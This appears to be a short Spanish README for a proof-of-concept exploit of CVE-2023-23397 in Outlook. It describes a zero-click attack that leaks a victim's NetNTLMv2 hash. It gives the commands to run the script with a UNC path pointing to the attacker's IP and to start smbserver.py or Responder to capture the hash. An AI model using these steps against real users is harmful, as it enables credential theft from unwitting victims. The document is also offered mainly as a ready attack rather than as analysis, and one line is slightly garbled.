
Simple PoC de la vulnerabilidad CVE-2023-23397 con el payload enviado por correo electrónico.
PoC simple y sucio de la vulnerabilidad CVE-2023-23397 que afecta al cliente pesado de Outlook.
Outlook sufre de una falta de control sobre la entrada del usuario que permite configurar el sonido de una reunión y recordatorio de cita. De hecho, un atacante puede forzar a una víctima a realizar una conexión a su servidor sin ninguna manipulación por parte del usuario (vulnerabilidad de cero clics).
Un atacante que explota esta vulnerabilidad obtiene un resumen NetNTLMv2 basado en la contraseña del usuario atrapado a través de una solicitud SMB. La solicitud se activa tan pronto como el correo llega a la bandeja de entrada.
.msg.En una sesión :
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
En una segunda sesión (smbserver o responder como quieras).
smbserver.py -smb2support SHARE .
